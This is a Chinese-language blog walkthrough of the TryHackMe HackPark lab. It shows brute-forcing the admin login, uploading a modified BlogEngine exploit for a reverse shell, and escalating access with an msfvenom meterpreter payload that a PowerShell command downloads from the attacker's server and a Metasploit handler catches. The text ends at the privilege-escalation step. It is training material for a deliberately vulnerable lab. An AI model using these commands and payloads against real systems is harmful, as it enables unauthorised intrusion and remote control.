首页 > 其他分享 >TryHackMe | HackPark Writeup

TryHackMe | HackPark Writeup

时间:2023-07-11 22:47:11浏览次数:41  
标签:文件 exe 文件名 Writeup 然后 shell HackPark 上传 TryHackMe

TryHackMe | HackPark Writeup

可以用autorecon进行波信息收集,可以自动联动nmap和gobuster,但是扫的时间很久

所以我就直接拿nmap扫了

image-20230711135237158

可以看到俩个开放端口 80 3389

Task 1 Deploy the vulnerable Windows machine

 

Whats the name of the clown displayed on the homepage?

访问网页给了个小丑的图片,图像搜索页面上的小丑图像会显示名称“Pennywise”

先记着,说不定可能是密码或者一个key

Task 2 Using Hydra to brute-force a login

 

类型POST

image-20230711160051522

 

标题提示我们要暴力破解密码

访问网页,右边有个折叠栏,点开最下面有个login,点击进入admin后台登入页面

然后进行抓包,流程就不掩饰了(默认大家都会)密码本用的是kali自带的,

image-20230711155211322

然后密码登入进入到后台

image-20230711160513698

点击about就可以看到这个cms的一些基本信息

image-20230711160613858

What is the CVE?

利用searchsploit寻找漏洞

image-20230711202359586

然后可以执行命令来查看该漏洞文件里的漏洞编号

image-20230711202339743

然后用vim编辑文件保存

第一个双引号是自己IP,第二个是端口,将修改后的文件重命名为PostView.ascx

这是因为在DNN平台中,这个文件名是默认的用户控件文件名,而且这个文件名也被硬编码在一些重要的DNN文件中。
因此,攻击者将上传的文件重命名为“PostView.ascx”,可以欺骗DNN平台认为这是一个合法的用户控件文件,并绕过了上传文件类型和文件名的验证。这样一来,攻击者可以成功地上传并执行恶意代码。

image-20230711202648104

然后来到那个后台界面,点击content进入后点New创建新的

img

然后点击最后一个按钮,上传刚刚我们的漏洞文件,上传成功后选中这个文件,取个标题,然后SAVE保存

image-20230711203218861

然后访问/?theme=../../App_Data/files后得到反弹shell,执行whoami获得答案

image-20230711204837167

Task 4 Windows Privilege Escalation

题目提示我们可以使用 msfvenom 生成另一个反向 shell,这就和上次Alfred的差不多

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.44.14  LPORT=6666 -f exe >shell.exe
powershell -c "Invoke-WebRequest -Uri 'http://10.11.44.141:80/shell.exe' -OutFile 'shell.exe'"

image-20230711205618017

一样的再shell.exe上用python命令python3 -m http.server 80 创建http服务

image-20230711210225793

再开启msfconsole,然后还是一样的命令监听

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-thm-ip
set LPORT listening-port //这里的port是你第二次shell文件上设置的端口
run

然后再获得的shell命令中下载我们的shell.exe,再执行

image-20230711213427728

image-20230711214717038

image-20230711214736403

执行sysinfo得到系统信息

image-20230711220553154

提权

使用 Meterpreter 上传命令上传 WinPEAS 枚举可执行文件:

 



标签:文件,exe,文件名,Writeup,然后,shell,HackPark,上传,TryHackMe
From: https://www.cnblogs.com/l0vehzzz/p/17546141.html

相关文章

  • TryHackMe | Alfred Writeup
    TryHackMe|AlfredWriteupTask1InitialAccess1.1Howmanyportsareopen?nmap-sC-sV-AIP 明显3个开放端口1.2-Whatistheusernameandpasswordfortheloginpanel(intheformatusername:password)问我们登入的账号密码是啥研究了半天不知道密码......
  • TryHackMe | KenobiWriteup
    TryHackMe|KenobiWriteupTask1DeploythevulnerablemachineScanthemachinewithnmap,howmanyportsareopen?运行下nmap一眼就是7个Task2EnumeratingSambaforsharesSamba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使......
  • 2023Ciscn初赛WriteUp
    2023Ciscn初赛WriteUp基于国密SM2算法的密钥密文分发SM2密钥在线生成工具(const.net.cn)生成密钥,发送公钥allkey接口返回服务器端pubkey明文,privatekey密文以及randomString密文search接口可以直接拿到randomstring明文也就是C用C作为密钥用SM4_CBC解密privatekeyquantum......
  • 2023红明谷杯WriteUp
    2023红明谷WriteUpItTakesTwo!(赛后)比赛的时候脑瘫矩阵除的方向整错了,卡半天没出...最后没时间了#taskfromsage.allimport*fromCrypto.Util.numberimport*fromosimporturandomfromsecretimportflagn=16bound=2^15A=[ZZ.random_element(-bound,bo......
  • 第五届“强网杯”全国网络安全挑战赛-线上赛Writeup
    文章目录WEB[强网先锋]赌徒[强网先锋]寻宝MISC签到BlueTeamingISO1995CipherManEzTime问卷题WEB[强网先锋]赌徒目录扫描发现www.zip下载得到源码index.php<metacharset="utf-8"><?php//hintisinhint.phperror_reporting(1);classStart{public$name='guest';......
  • 2021数字中国创新大赛虎符网络安全赛-Writeup
    文章目录Web签到“慢慢做”管理系统Misc你会日志分析吗Web签到http://cn-sec.com/archives/313267.htmlUser-Agentt:zerodiumsystem("cat/flag");“慢慢做”管理系统根据题目提示,这里第一步登录应该利用一些字符串被md5($string,true)之后会形成如下,从而造成注入PSC:\Users\A......
  • 第十四届全国大学生信息安全竞赛-线上赛Writeup
    文章目录场景实操开场卷WEBeasy_sqleasy_sourceMISCtinytrafficrunning_pixel场景实操二阶卷WEBmiddle_sourceMISC隔空传话场景实操冲刺卷MISCrobot场景实操开场卷WEBeasy_sql有sql报错简单fuzz了一下发现过滤了union、information、column、inno等关键字。无表名,无列名注入......
  • 2021-DASCTF-三月赛-Writeup
    文章目录WEBBestDBez_serializebaby_flaskez_loginMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(MostVegetablePeople)WEBBestDB简单的SQL注入/?query=mochu"or/**/1=1%23/?query=mochu"order/**/by/**/......
  • 2020 纵横杯 线上赛 MISC部分Writeup
    文章目录签到马赛克My_Secret问卷调查签到oct_str='[0146,0154,0141,0147,0173,0167,063,0154,0143,0157,0155,0145,0137,0164,0157,0137,062,0157,0156,0147,0137,0150,063,0156,0147,0137,0142,0145,061,0175]'oct_list=oct_str.replace(&q......
  • 白帽子社区端午节活动-白帽寻宝记-纪念屈原Writeup
    搜索引擎找一下即可得知:姓:芈氏:屈名:平字:原md5(芈屈平原,32)=16ccb09f96f27af192f541992560d695解压后先查看文件先来看看这个吧在两张图片的的中间存在一串base64解码得到WingDing编码◻︎♋︎⬧︎⬧︎⬥︎□︎❒︎♎︎♓︎⬧︎♋︎♌︎❍︎◻︎♐︎♓︎●︎♏︎⬥︎♓︎⧫︎♒︎♋︎♌︎♓︎⧫︎♎︎♏︎◻︎⧫︎♒︎□︎♐︎......